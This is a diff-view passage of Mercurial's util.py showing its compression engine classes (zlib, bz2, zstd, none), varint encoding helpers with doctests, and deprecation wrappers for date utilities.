3471 The docstring of this method is used in the help system to tell users
3480 about this engine.
3472 about this engine.
3481 """
3473 """
3482 return None
3474 return None
3483
3475
3484 def wireprotosupport(self):
3476 def wireprotosupport(self):
3485 """Declare support for this compression format on the wire protocol.
3477 """Declare support for this compression format on the wire protocol.
3486
3478
3487 If this compression engine isn't supported for compressing wire
3479 If this compression engine isn't supported for compressing wire
3488 protocol payloads, returns None.
3480 protocol payloads, returns None.
3489
3481
3490 Otherwise, returns ``compenginewireprotosupport`` with the following
3482 Otherwise, returns ``compenginewireprotosupport`` with the following
3491 fields:
3483 fields:
3492
3484
3493 * String format identifier
3485 * String format identifier
3494 * Integer priority for the server
3486 * Integer priority for the server
3495 * Integer priority for the client
3487 * Integer priority for the client
3496
3488
3497 The integer priorities are used to order the advertisement of format
3489 The integer priorities are used to order the advertisement of format
3498 support by server and client. The highest integer is advertised
3490 support by server and client. The highest integer is advertised
3499 first. Integers with non-positive values aren't advertised.
3491 first. Integers with non-positive values aren't advertised.
3500
3492
3501 The priority values are somewhat arbitrary and only used for default
3493 The priority values are somewhat arbitrary and only used for default
3502 ordering. The relative order can be changed via config options.
3494 ordering. The relative order can be changed via config options.
3503
3495
3504 If wire protocol compression is supported, the class must also implement
3496 If wire protocol compression is supported, the class must also implement
3505 ``compressstream`` and ``decompressorreader``.
3497 ``compressstream`` and ``decompressorreader``.
3506 """
3498 """
3507 return None
3499 return None
3508
3500
3509 def revlogheader(self):
3501 def revlogheader(self):
3510 """Header added to revlog chunks that identifies this engine.
3502 """Header added to revlog chunks that identifies this engine.
3511
3503
3512 If this engine can be used to compress revlogs, this method should
3504 If this engine can be used to compress revlogs, this method should
3513 return the bytes used to identify chunks compressed with this engine.
3505 return the bytes used to identify chunks compressed with this engine.
3514 Else, the method should return ``None`` to indicate it does not
3506 Else, the method should return ``None`` to indicate it does not
3515 participate in revlog compression.
3507 participate in revlog compression.
3516 """
3508 """
3517 return None
3509 return None
3518
3510
3519 def compressstream(self, it, opts=None):
3511 def compressstream(self, it, opts=None):
3520 """Compress an iterator of chunks.
3512 """Compress an iterator of chunks.
3521
3513
3522 The method receives an iterator (ideally a generator) of chunks of
3514 The method receives an iterator (ideally a generator) of chunks of
3523 bytes to be compressed. It returns an iterator (ideally a generator)
3515 bytes to be compressed. It returns an iterator (ideally a generator)
3524 of bytes of chunks representing the compressed output.
3516 of bytes of chunks representing the compressed output.
3525
3517
3526 Optionally accepts an argument defining how to perform compression.
3518 Optionally accepts an argument defining how to perform compression.
3527 Each engine treats this argument differently.
3519 Each engine treats this argument differently.
3528 """
3520 """
3529 raise NotImplementedError()
3521 raise NotImplementedError()
3530
3522
3531 def decompressorreader(self, fh):
3523 def decompressorreader(self, fh):
3532 """Perform decompression on a file object.
3524 """Perform decompression on a file object.
3533
3525
3534 Argument is an object with a ``read(size)`` method that returns
3526 Argument is an object with a ``read(size)`` method that returns
3535 compressed data. Return value is an object with a ``read(size)`` that
3527 compressed data. Return value is an object with a ``read(size)`` that
3536 returns uncompressed data.
3528 returns uncompressed data.
3537 """
3529 """
3538 raise NotImplementedError()
3530 raise NotImplementedError()
3539
3531
3540 def revlogcompressor(self, opts=None):
3532 def revlogcompressor(self, opts=None):
3541 """Obtain an object that can be used to compress revlog entries.
3533 """Obtain an object that can be used to compress revlog entries.
3542
3534
3543 The object has a ``compress(data)`` method that compresses binary
3535 The object has a ``compress(data)`` method that compresses binary
3544 data. This method returns compressed binary data or ``None`` if
3536 data. This method returns compressed binary data or ``None`` if
3545 the data could not be compressed (too small, not compressible, etc).
3537 the data could not be compressed (too small, not compressible, etc).
3546 The returned data should have a header uniquely identifying this
3538 The returned data should have a header uniquely identifying this
3547 compression format so decompression can be routed to this engine.
3539 compression format so decompression can be routed to this engine.
3548 This header should be identified by the ``revlogheader()`` return
3540 This header should be identified by the ``revlogheader()`` return
3549 value.
3541 value.
3550
3542
3551 The object has a ``decompress(data)`` method that decompresses
3543 The object has a ``decompress(data)`` method that decompresses
3552 data. The method will only be called if ``data`` begins with
3544 data. The method will only be called if ``data`` begins with
3553 ``revlogheader()``. The method should return the raw, uncompressed
3545 ``revlogheader()``. The method should return the raw, uncompressed
3554 data or raise a ``RevlogError``.
3546 data or raise a ``RevlogError``.
3555
3547
3556 The object is reusable but is not thread safe.
3548 The object is reusable but is not thread safe.
3557 """
3549 """
3558 raise NotImplementedError()
3550 raise NotImplementedError()
3559
3551
3560 class _zlibengine(compressionengine):
3552 class _zlibengine(compressionengine):
3561 def name(self):
3553 def name(self):
3562 return 'zlib'
3554 return 'zlib'
3563
3555
3564 def bundletype(self):
3556 def bundletype(self):
3565 """zlib compression using the DEFLATE algorithm.
3557 """zlib compression using the DEFLATE algorithm.
3566
3558
3567 All Mercurial clients should support this format. The compression
3559 All Mercurial clients should support this format. The compression
3568 algorithm strikes a reasonable balance between compression ratio
3560 algorithm strikes a reasonable balance between compression ratio
3569 and size.
3561 and size.
3570 """
3562 """
3571 return 'gzip', 'GZ'
3563 return 'gzip', 'GZ'
3572
3564
3573 def wireprotosupport(self):
3565 def wireprotosupport(self):
3574 return compewireprotosupport('zlib', 20, 20)
3566 return compewireprotosupport('zlib', 20, 20)
3575
3567
3576 def revlogheader(self):
3568 def revlogheader(self):
3577 return 'x'
3569 return 'x'
3578
3570
3579 def compressstream(self, it, opts=None):
3571 def compressstream(self, it, opts=None):
3580 opts = opts or {}
3572 opts = opts or {}
3581
3573
3582 z = zlib.compressobj(opts.get('level', -1))
3574 z = zlib.compressobj(opts.get('level', -1))
3583 for chunk in it:
3575 for chunk in it:
3584 data = z.compress(chunk)
3576 data = z.compress(chunk)
3585 # Not all calls to compress emit data. It is cheaper to inspect
3577 # Not all calls to compress emit data. It is cheaper to inspect
3586 # here than to feed empty chunks through generator.
3578 # here than to feed empty chunks through generator.
3587 if data:
3579 if data:
3588 yield data
3580 yield data
3589
3581
3590 yield z.flush()
3582 yield z.flush()
3591
3583
3592 def decompressorreader(self, fh):
3584 def decompressorreader(self, fh):
3593 def gen():
3585 def gen():
3594 d = zlib.decompressobj()
3586 d = zlib.decompressobj()
3595 for chunk in filechunkiter(fh):
3587 for chunk in filechunkiter(fh):
3596 while chunk:
3588 while chunk:
3597 # Limit output size to limit memory.
3589 # Limit output size to limit memory.
3598 yield d.decompress(chunk, 2 ** 18)
3590 yield d.decompress(chunk, 2 ** 18)
3599 chunk = d.unconsumed_tail
3591 chunk = d.unconsumed_tail
3600
3592
3601 return chunkbuffer(gen())
3593 return chunkbuffer(gen())
3602
3594
3603 class zlibrevlogcompressor(object):
3595 class zlibrevlogcompressor(object):
3604 def compress(self, data):
3596 def compress(self, data):
3605 insize = len(data)
3597 insize = len(data)
3606 # Caller handles empty input case.
3598 # Caller handles empty input case.
3607 assert insize > 0
3599 assert insize > 0
3608
3600
3609 if insize < 44:
3601 if insize < 44:
3610 return None
3602 return None
3611
3603
3612 elif insize <= 1000000:
3604 elif insize <= 1000000:
3613 compressed = zlib.compress(data)
3605 compressed = zlib.compress(data)
3614 if len(compressed) < insize:
3606 if len(compressed) < insize:
3615 return compressed
3607 return compressed
3616 return None
3608 return None
3617
3609
3618 # zlib makes an internal copy of the input buffer, doubling
3610 # zlib makes an internal copy of the input buffer, doubling
3619 # memory usage for large inputs. So do streaming compression
3611 # memory usage for large inputs. So do streaming compression
3620 # on large inputs.
3612 # on large inputs.
3621 else:
3613 else:
3622 z = zlib.compressobj()
3614 z = zlib.compressobj()
3623 parts = []
3615 parts = []
3624 pos = 0
3616 pos = 0
3625 while pos < insize:
3617 while pos < insize:
3626 pos2 = pos + 2**20
3618 pos2 = pos + 2**20
3627 parts.append(z.compress(data[pos:pos2]))
3619 parts.append(z.compress(data[pos:pos2]))
3628 pos = pos2
3620 pos = pos2
3629 parts.append(z.flush())
3621 parts.append(z.flush())
3630
3622
3631 if sum(map(len, parts)) < insize:
3623 if sum(map(len, parts)) < insize:
3632 return ''.join(parts)
3624 return ''.join(parts)
3633 return None
3625 return None
3634
3626
3635 def decompress(self, data):
3627 def decompress(self, data):
3636 try:
3628 try:
3637 return zlib.decompress(data)
3629 return zlib.decompress(data)
3638 except zlib.error as e:
3630 except zlib.error as e:
3639 raise error.RevlogError(_('revlog decompress error: %s') %
3631 raise error.RevlogError(_('revlog decompress error: %s') %
3640 forcebytestr(e))
3632 forcebytestr(e))
3641
3633
3642 def revlogcompressor(self, opts=None):
3634 def revlogcompressor(self, opts=None):
3643 return self.zlibrevlogcompressor()
3635 return self.zlibrevlogcompressor()
3644
3636
3645 compengines.register(_zlibengine())
3637 compengines.register(_zlibengine())
3646
3638
3647 class _bz2engine(compressionengine):
3639 class _bz2engine(compressionengine):
3648 def name(self):
3640 def name(self):
3649 return 'bz2'
3641 return 'bz2'
3650
3642
3651 def bundletype(self):
3643 def bundletype(self):
3652 """An algorithm that produces smaller bundles than ``gzip``.
3644 """An algorithm that produces smaller bundles than ``gzip``.
3653
3645
3654 All Mercurial clients should support this format.
3646 All Mercurial clients should support this format.
3655
3647
3656 This engine will likely produce smaller bundles than ``gzip`` but
3648 This engine will likely produce smaller bundles than ``gzip`` but
3657 will be significantly slower, both during compression and
3649 will be significantly slower, both during compression and
3658 decompression.
3650 decompression.
3659
3651
3660 If available, the ``zstd`` engine can yield similar or better
3652 If available, the ``zstd`` engine can yield similar or better
3661 compression at much higher speeds.
3653 compression at much higher speeds.
3662 """
3654 """
3663 return 'bzip2', 'BZ'
3655 return 'bzip2', 'BZ'
3664
3656
3665 # We declare a protocol name but don't advertise by default because
3657 # We declare a protocol name but don't advertise by default because
3666 # it is slow.
3658 # it is slow.
3667 def wireprotosupport(self):
3659 def wireprotosupport(self):
3668 return compewireprotosupport('bzip2', 0, 0)
3660 return compewireprotosupport('bzip2', 0, 0)
3669
3661
3670 def compressstream(self, it, opts=None):
3662 def compressstream(self, it, opts=None):
3671 opts = opts or {}
3663 opts = opts or {}
3672 z = bz2.BZ2Compressor(opts.get('level', 9))
3664 z = bz2.BZ2Compressor(opts.get('level', 9))
3673 for chunk in it:
3665 for chunk in it:
3674 data = z.compress(chunk)
3666 data = z.compress(chunk)
3675 if data:
3667 if data:
3676 yield data
3668 yield data
3677
3669
3678 yield z.flush()
3670 yield z.flush()
3679
3671
3680 def decompressorreader(self, fh):
3672 def decompressorreader(self, fh):
3681 def gen():
3673 def gen():
3682 d = bz2.BZ2Decompressor()
3674 d = bz2.BZ2Decompressor()
3683 for chunk in filechunkiter(fh):
3675 for chunk in filechunkiter(fh):
3684 yield d.decompress(chunk)
3676 yield d.decompress(chunk)
3685
3677
3686 return chunkbuffer(gen())
3678 return chunkbuffer(gen())
3687
3679
3688 compengines.register(_bz2engine())
3680 compengines.register(_bz2engine())
3689
3681
3690 class _truncatedbz2engine(compressionengine):
3682 class _truncatedbz2engine(compressionengine):
3691 def name(self):
3683 def name(self):
3692 return 'bz2truncated'
3684 return 'bz2truncated'
3693
3685
3694 def bundletype(self):
3686 def bundletype(self):
3695 return None, '_truncatedBZ'
3687 return None, '_truncatedBZ'
3696
3688
3697 # We don't implement compressstream because it is hackily handled elsewhere.
3689 # We don't implement compressstream because it is hackily handled elsewhere.
3698
3690
3699 def decompressorreader(self, fh):
3691 def decompressorreader(self, fh):
3700 def gen():
3692 def gen():
3701 # The input stream doesn't have the 'BZ' header. So add it back.
3693 # The input stream doesn't have the 'BZ' header. So add it back.
3702 d = bz2.BZ2Decompressor()
3694 d = bz2.BZ2Decompressor()
3703 d.decompress('BZ')
3695 d.decompress('BZ')
3704 for chunk in filechunkiter(fh):
3696 for chunk in filechunkiter(fh):
3705 yield d.decompress(chunk)
3697 yield d.decompress(chunk)
3706
3698
3707 return chunkbuffer(gen())
3699 return chunkbuffer(gen())
3708
3700
3709 compengines.register(_truncatedbz2engine())
3701 compengines.register(_truncatedbz2engine())
3710
3702
3711 class _noopengine(compressionengine):
3703 class _noopengine(compressionengine):
3712 def name(self):
3704 def name(self):
3713 return 'none'
3705 return 'none'
3714
3706
3715 def bundletype(self):
3707 def bundletype(self):
3716 """No compression is performed.
3708 """No compression is performed.
3717
3709
3718 Use this compression engine to explicitly disable compression.
3710 Use this compression engine to explicitly disable compression.
3719 """
3711 """
3720 return 'none', 'UN'
3712 return 'none', 'UN'
3721
3713
3722 # Clients always support uncompressed payloads. Servers don't because
3714 # Clients always support uncompressed payloads. Servers don't because
3723 # unless you are on a fast network, uncompressed payloads can easily
3715 # unless you are on a fast network, uncompressed payloads can easily
3724 # saturate your network pipe.
3716 # saturate your network pipe.
3725 def wireprotosupport(self):
3717 def wireprotosupport(self):
3726 return compewireprotosupport('none', 0, 10)
3718 return compewireprotosupport('none', 0, 10)
3727
3719
3728 # We don't implement revlogheader because it is handled specially
3720 # We don't implement revlogheader because it is handled specially
3729 # in the revlog class.
3721 # in the revlog class.
3730
3722
3731 def compressstream(self, it, opts=None):
3723 def compressstream(self, it, opts=None):
3732 return it
3724 return it
3733
3725
3734 def decompressorreader(self, fh):
3726 def decompressorreader(self, fh):
3735 return fh
3727 return fh
3736
3728
3737 class nooprevlogcompressor(object):
3729 class nooprevlogcompressor(object):
3738 def compress(self, data):
3730 def compress(self, data):
3739 return None
3731 return None
3740
3732
3741 def revlogcompressor(self, opts=None):
3733 def revlogcompressor(self, opts=None):
3742 return self.nooprevlogcompressor()
3734 return self.nooprevlogcompressor()
3743
3735
3744 compengines.register(_noopengine())
3736 compengines.register(_noopengine())
3745
3737
3746 class _zstdengine(compressionengine):
3738 class _zstdengine(compressionengine):
3747 def name(self):
3739 def name(self):
3748 return 'zstd'
3740 return 'zstd'
3749
3741
3750 @propertycache
3742 @propertycache
3751 def _module(self):
3743 def _module(self):
3752 # Not all installs have the zstd module available. So defer importing
3744 # Not all installs have the zstd module available. So defer importing
3753 # until first access.
3745 # until first access.
3754 try:
3746 try:
3755 from . import zstd
3747 from . import zstd
3756 # Force delayed import.
3748 # Force delayed import.
3757 zstd.__version__
3749 zstd.__version__
3758 return zstd
3750 return zstd
3759 except ImportError:
3751 except ImportError:
3760 return None
3752 return None
3761
3753
3762 def available(self):
3754 def available(self):
3763 return bool(self._module)
3755 return bool(self._module)
3764
3756
3765 def bundletype(self):
3757 def bundletype(self):
3766 """A modern compression algorithm that is fast and highly flexible.
3758 """A modern compression algorithm that is fast and highly flexible.
3767
3759
3768 Only supported by Mercurial 4.1 and newer clients.
3760 Only supported by Mercurial 4.1 and newer clients.
3769
3761
3770 With the default settings, zstd compression is both faster and yields
3762 With the default settings, zstd compression is both faster and yields
3771 better compression than ``gzip``. It also frequently yields better
3763 better compression than ``gzip``. It also frequently yields better
3772 compression than ``bzip2`` while operating at much higher speeds.
3764 compression than ``bzip2`` while operating at much higher speeds.
3773
3765
3774 If this engine is available and backwards compatibility is not a
3766 If this engine is available and backwards compatibility is not a
3775 concern, it is likely the best available engine.
3767 concern, it is likely the best available engine.
3776 """
3768 """
3777 return 'zstd', 'ZS'
3769 return 'zstd', 'ZS'
3778
3770
3779 def wireprotosupport(self):
3771 def wireprotosupport(self):
3780 return compewireprotosupport('zstd', 50, 50)
3772 return compewireprotosupport('zstd', 50, 50)
3781
3773
3782 def revlogheader(self):
3774 def revlogheader(self):
3783 return '\x28'
3775 return '\x28'
3784
3776
3785 def compressstream(self, it, opts=None):
3777 def compressstream(self, it, opts=None):
3786 opts = opts or {}
3778 opts = opts or {}
3787 # zstd level 3 is almost always significantly faster than zlib
3779 # zstd level 3 is almost always significantly faster than zlib
3788 # while providing no worse compression. It strikes a good balance
3780 # while providing no worse compression. It strikes a good balance
3789 # between speed and compression.
3781 # between speed and compression.
3790 level = opts.get('level', 3)
3782 level = opts.get('level', 3)
3791
3783
3792 zstd = self._module
3784 zstd = self._module
3793 z = zstd.ZstdCompressor(level=level).compressobj()
3785 z = zstd.ZstdCompressor(level=level).compressobj()
3794 for chunk in it:
3786 for chunk in it:
3795 data = z.compress(chunk)
3787 data = z.compress(chunk)
3796 if data:
3788 if data:
3797 yield data
3789 yield data
3798
3790
3799 yield z.flush()
3791 yield z.flush()
3800
3792
3801 def decompressorreader(self, fh):
3793 def decompressorreader(self, fh):
3802 zstd = self._module
3794 zstd = self._module
3803 dctx = zstd.ZstdDecompressor()
3795 dctx = zstd.ZstdDecompressor()
3804 return chunkbuffer(dctx.read_from(fh))
3796 return chunkbuffer(dctx.read_from(fh))
3805
3797
3806 class zstdrevlogcompressor(object):
3798 class zstdrevlogcompressor(object):
3807 def __init__(self, zstd, level=3):
3799 def __init__(self, zstd, level=3):
3808 # Writing the content size adds a few bytes to the output. However,
3800 # Writing the content size adds a few bytes to the output. However,
3809 # it allows decompression to be more optimal since we can
3801 # it allows decompression to be more optimal since we can
3810 # pre-allocate a buffer to hold the result.
3802 # pre-allocate a buffer to hold the result.
3811 self._cctx = zstd.ZstdCompressor(level=level,
3803 self._cctx = zstd.ZstdCompressor(level=level,
3812 write_content_size=True)
3804 write_content_size=True)
3813 self._dctx = zstd.ZstdDecompressor()
3805 self._dctx = zstd.ZstdDecompressor()
3814 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
3806 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
3815 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
3807 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
3816
3808
3817 def compress(self, data):
3809 def compress(self, data):
3818 insize = len(data)
3810 insize = len(data)
3819 # Caller handles empty input case.
3811 # Caller handles empty input case.
3820 assert insize > 0
3812 assert insize > 0
3821
3813
3822 if insize < 50:
3814 if insize < 50:
3823 return None
3815 return None
3824
3816
3825 elif insize <= 1000000:
3817 elif insize <= 1000000:
3826 compressed = self._cctx.compress(data)
3818 compressed = self._cctx.compress(data)
3827 if len(compressed) < insize:
3819 if len(compressed) < insize:
3828 return compressed
3820 return compressed
3829 return None
3821 return None
3830 else:
3822 else:
3831 z = self._cctx.compressobj()
3823 z = self._cctx.compressobj()
3832 chunks = []
3824 chunks = []
3833 pos = 0
3825 pos = 0
3834 while pos < insize:
3826 while pos < insize:
3835 pos2 = pos + self._compinsize
3827 pos2 = pos + self._compinsize
3836 chunk = z.compress(data[pos:pos2])
3828 chunk = z.compress(data[pos:pos2])
3837 if chunk:
3829 if chunk:
3838 chunks.append(chunk)
3830 chunks.append(chunk)
3839 pos = pos2
3831 pos = pos2
3840 chunks.append(z.flush())
3832 chunks.append(z.flush())
3841
3833
3842 if sum(map(len, chunks)) < insize:
3834 if sum(map(len, chunks)) < insize:
3843 return ''.join(chunks)
3835 return ''.join(chunks)
3844 return None
3836 return None
3845
3837
3846 def decompress(self, data):
3838 def decompress(self, data):
3847 insize = len(data)
3839 insize = len(data)
3848
3840
3849 try:
3841 try:
3850 # This was measured to be faster than other streaming
3842 # This was measured to be faster than other streaming
3851 # decompressors.
3843 # decompressors.
3852 dobj = self._dctx.decompressobj()
3844 dobj = self._dctx.decompressobj()
3853 chunks = []
3845 chunks = []
3854 pos = 0
3846 pos = 0
3855 while pos < insize:
3847 while pos < insize:
3856 pos2 = pos + self._decompinsize
3848 pos2 = pos + self._decompinsize
3857 chunk = dobj.decompress(data[pos:pos2])
3849 chunk = dobj.decompress(data[pos:pos2])
3858 if chunk:
3850 if chunk:
3859 chunks.append(chunk)
3851 chunks.append(chunk)
3860 pos = pos2
3852 pos = pos2
3861 # Frame should be exhausted, so no finish() API.
3853 # Frame should be exhausted, so no finish() API.
3862
3854
3863 return ''.join(chunks)
3855 return ''.join(chunks)
3864 except Exception as e:
3856 except Exception as e:
3865 raise error.RevlogError(_('revlog decompress error: %s') %
3857 raise error.RevlogError(_('revlog decompress error: %s') %
3866 forcebytestr(e))
3858 forcebytestr(e))
3867
3859
3868 def revlogcompressor(self, opts=None):
3860 def revlogcompressor(self, opts=None):
3869 opts = opts or {}
3861 opts = opts or {}
3870 return self.zstdrevlogcompressor(self._module,
3862 return self.zstdrevlogcompressor(self._module,
3871 level=opts.get('level', 3))
3863 level=opts.get('level', 3))
3872
3864
3873 compengines.register(_zstdengine())
3865 compengines.register(_zstdengine())
3874
3866
3875 def bundlecompressiontopics():
3867 def bundlecompressiontopics():
3876 """Obtains a list of available bundle compressions for use in help."""
3868 """Obtains a list of available bundle compressions for use in help."""
3877 # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
3869 # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
3878 items = {}
3870 items = {}
3879
3871
3880 # We need to format the docstring. So use a dummy object/type to hold it
3872 # We need to format the docstring. So use a dummy object/type to hold it
3881 # rather than mutating the original.
3873 # rather than mutating the original.
3882 class docobject(object):
3874 class docobject(object):
3883 pass
3875 pass
3884
3876
3885 for name in compengines:
3877 for name in compengines:
3886 engine = compengines[name]
3878 engine = compengines[name]
3887
3879
3888 if not engine.available():
3880 if not engine.available():
3889 continue
3881 continue
3890
3882
3891 bt = engine.bundletype()
3883 bt = engine.bundletype()
3892 if not bt or not bt[0]:
3884 if not bt or not bt[0]:
3893 continue
3885 continue
3894
3886
3895 doc = pycompat.sysstr('``%s``\n %s') % (
3887 doc = pycompat.sysstr('``%s``\n %s') % (
3896 bt[0], engine.bundletype.__doc__)
3888 bt[0], engine.bundletype.__doc__)
3897
3889
3898 value = docobject()
3890 value = docobject()
3899 value.__doc__ = doc
3891 value.__doc__ = doc
3900 value._origdoc = engine.bundletype.__doc__
3892 value._origdoc = engine.bundletype.__doc__
3901 value._origfunc = engine.bundletype
3893 value._origfunc = engine.bundletype
3902
3894
3903 items[bt[0]] = value
3895 items[bt[0]] = value
3904
3896
3905 return items
3897 return items
3906
3898
3907 i18nfunctions = bundlecompressiontopics().values()
3899 i18nfunctions = bundlecompressiontopics().values()
3908
3900
3909 # convenient shortcut
3901 # convenient shortcut
3910 dst = debugstacktrace
3902 dst = debugstacktrace
3911
3903
3912 def safename(f, tag, ctx, others=None):
3904 def safename(f, tag, ctx, others=None):
3913 """
3905 """
3914 Generate a name that it is safe to rename f to in the given context.
3906 Generate a name that it is safe to rename f to in the given context.
3915
3907
3916 f: filename to rename
3908 f: filename to rename
3917 tag: a string tag that will be included in the new name
3909 tag: a string tag that will be included in the new name
3918 ctx: a context, in which the new name must not exist
3910 ctx: a context, in which the new name must not exist
3919 others: a set of other filenames that the new name must not be in
3911 others: a set of other filenames that the new name must not be in
3920
3912
3921 Returns a file name of the form oldname~tag[~number] which does not exist
3913 Returns a file name of the form oldname~tag[~number] which does not exist
3922 in the provided context and is not in the set of other names.
3914 in the provided context and is not in the set of other names.
3923 """
3915 """
3924 if others is None:
3916 if others is None:
3925 others = set()
3917 others = set()
3926
3918
3927 fn = '%s~%s' % (f, tag)
3919 fn = '%s~%s' % (f, tag)
3928 if fn not in ctx and fn not in others:
3920 if fn not in ctx and fn not in others:
3929 return fn
3921 return fn
3930 for n in itertools.count(1):
3922 for n in itertools.count(1):
3931 fn = '%s~%s~%s' % (f, tag, n)
3923 fn = '%s~%s~%s' % (f, tag, n)
3932 if fn not in ctx and fn not in others:
3924 if fn not in ctx and fn not in others:
3933 return fn
3925 return fn
3934
3926
3935 def readexactly(stream, n):
3927 def readexactly(stream, n):
3936 '''read n bytes from stream.read and abort if less was available'''
3928 '''read n bytes from stream.read and abort if less was available'''
3937 s = stream.read(n)
3929 s = stream.read(n)
3938 if len(s) < n:
3930 if len(s) < n:
3939 raise error.Abort(_("stream ended unexpectedly"
3931 raise error.Abort(_("stream ended unexpectedly"
3940 " (got %d bytes, expected %d)")
3932 " (got %d bytes, expected %d)")
3941 % (len(s), n))
3933 % (len(s), n))
3942 return s
3934 return s
3943
3935
3944 def uvarintencode(value):
3936 def uvarintencode(value):
3945 """Encode an unsigned integer value to a varint.
3937 """Encode an unsigned integer value to a varint.
3946
3938
3947 A varint is a variable length integer of 1 or more bytes. Each byte
3939 A varint is a variable length integer of 1 or more bytes. Each byte
3948 except the last has the most significant bit set. The lower 7 bits of
3940 except the last has the most significant bit set. The lower 7 bits of
3949 each byte store the 2's complement representation, least significant group
3941 each byte store the 2's complement representation, least significant group
3950 first.
3942 first.
3951
3943
3952 >>> uvarintencode(0)
3944 >>> uvarintencode(0)
3953 '\\x00'
3945 '\\x00'
3954 >>> uvarintencode(1)
3946 >>> uvarintencode(1)
3955 '\\x01'
3947 '\\x01'
3956 >>> uvarintencode(127)
3948 >>> uvarintencode(127)
3957 '\\x7f'
3949 '\\x7f'
3958 >>> uvarintencode(1337)
3950 >>> uvarintencode(1337)
3959 '\\xb9\\n'
3951 '\\xb9\\n'
3960 >>> uvarintencode(65536)
3952 >>> uvarintencode(65536)
3961 '\\x80\\x80\\x04'
3953 '\\x80\\x80\\x04'
3962 >>> uvarintencode(-1)
3954 >>> uvarintencode(-1)
3963 Traceback (most recent call last):
3955 Traceback (most recent call last):
3964 ...
3956 ...
3965 ProgrammingError: negative value for uvarint: -1
3957 ProgrammingError: negative value for uvarint: -1
3966 """
3958 """
3967 if value < 0:
3959 if value < 0:
3968 raise error.ProgrammingError('negative value for uvarint: %d'
3960 raise error.ProgrammingError('negative value for uvarint: %d'
3969 % value)
3961 % value)
3970 bits = value & 0x7f
3962 bits = value & 0x7f
3971 value >>= 7
3963 value >>= 7
3972 bytes = []
3964 bytes = []
3973 while value:
3965 while value:
3974 bytes.append(pycompat.bytechr(0x80 | bits))
3966 bytes.append(pycompat.bytechr(0x80 | bits))
3975 bits = value & 0x7f
3967 bits = value & 0x7f
3976 value >>= 7
3968 value >>= 7
3977 bytes.append(pycompat.bytechr(bits))
3969 bytes.append(pycompat.bytechr(bits))
3978
3970
3979 return ''.join(bytes)
3971 return ''.join(bytes)
3980
3972
3981 def uvarintdecodestream(fh):
3973 def uvarintdecodestream(fh):
3982 """Decode an unsigned variable length integer from a stream.
3974 """Decode an unsigned variable length integer from a stream.
3983
3975
3984 The passed argument is anything that has a ``.read(N)`` method.
3976 The passed argument is anything that has a ``.read(N)`` method.
3985
3977
3986 >>> try:
3978 >>> try:
3987 ... from StringIO import StringIO as BytesIO
3979 ... from StringIO import StringIO as BytesIO
3988 ... except ImportError:
3980 ... except ImportError:
3989 ... from io import BytesIO
3981 ... from io import BytesIO
3990 >>> uvarintdecodestream(BytesIO(b'\\x00'))
3982 >>> uvarintdecodestream(BytesIO(b'\\x00'))
3991 0
3983 0
3992 >>> uvarintdecodestream(BytesIO(b'\\x01'))
3984 >>> uvarintdecodestream(BytesIO(b'\\x01'))
3993 1
3985 1
3994 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
3986 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
3995 127
3987 127
3996 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
3988 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
3997 1337
3989 1337
3998 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
3990 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
3999 65536
3991 65536
4000 >>> uvarintdecodestream(BytesIO(b'\\x80'))
3992 >>> uvarintdecodestream(BytesIO(b'\\x80'))
4001 Traceback (most recent call last):
3993 Traceback (most recent call last):
4002 ...
3994 ...
4003 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
3995 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
4004 """
3996 """
4005 result = 0
3997 result = 0
4006 shift = 0
3998 shift = 0
4007 while True:
3999 while True:
4008 byte = ord(readexactly(fh, 1))
4000 byte = ord(readexactly(fh, 1))
4009 result |= ((byte & 0x7f) << shift)
4001 result |= ((byte & 0x7f) << shift)
4010 if not (byte & 0x80):
4002 if not (byte & 0x80):
4011 return result
4003 return result
4012 shift += 7
4004 shift += 7
4013
4005
4014 ###
4006 ###
4015 # Deprecation warnings for util.py splitting
4007 # Deprecation warnings for util.py splitting
4016 ###
4008 ###
4017
4009
4018 defaultdateformats = dateutil.defaultdateformats
4010 defaultdateformats = dateutil.defaultdateformats
4019
4011
4020 extendeddateformats = dateutil.extendeddateformats
4012 extendeddateformats = dateutil.extendeddateformats
4021
4013
4022 def makedate(*args, **kwargs):
4014 def makedate(*args, **kwargs):
4023 msg = ("'util.makedate' is deprecated, "
4015 msg = ("'util.makedate' is deprecated, "
4024 "use 'utils.dateutil.makedate'")
4016 "use 'utils.dateutil.makedate'")
4025 nouideprecwarn(msg, "4.6")
4017 nouideprecwarn(msg, "4.6")
4026 return dateutil.makedate(*args, **kwargs)
4018 return dateutil.makedate(*args, **kwargs)
4027
4019
4028 def datestr(*args, **kwargs):
4020 def datestr(*args, **kwargs):
4029 msg = ("'util.datestr' is deprecated, "
4021 msg = ("'util.datestr' is deprecated, "
4030 "use 'utils.dateutil.datestr'")
4022 "use 'utils.dateutil.datestr'")
4031 nouideprecwarn(msg, "4.6")
4023 nouideprecwarn(msg, "4.6")
4032 debugstacktrace()
4024 debugstacktrace()
4033 return dateutil.datestr(*args, **kwargs)
4025 return dateutil.datestr(*args, **kwargs)
4034
4026
4035 def shortdate(*args, **kwargs):
4027 def shortdate(*args, **kwargs):
4036 msg = ("'util.shortdate' is deprecated, "
4028 msg = ("'util.shortdate' is deprecated, "
4037 "use 'utils.dateutil.shortdate'")
4029 "use 'utils.dateutil.shortdate'")
4038 nouideprecwarn(msg, "4.6")
4030 nouideprecwarn(msg, "4.6")
4039 return dateutil.shortdate(*args, **kwargs)
4031 return dateutil.shortdate(*args, **kwargs)
4040
4032
4041 def parsetimezone(*args, **kwargs):
4033 def parsetimezone(*args, **kwargs):
4042 msg = ("'util.parsetimezone' is deprecated, "
4034 msg = ("'util.parsetimezone' is deprecated, "
4043 "use 'utils.dateutil.parsetimezone'")
4035 "use 'utils.dateutil.parsetimezone'")
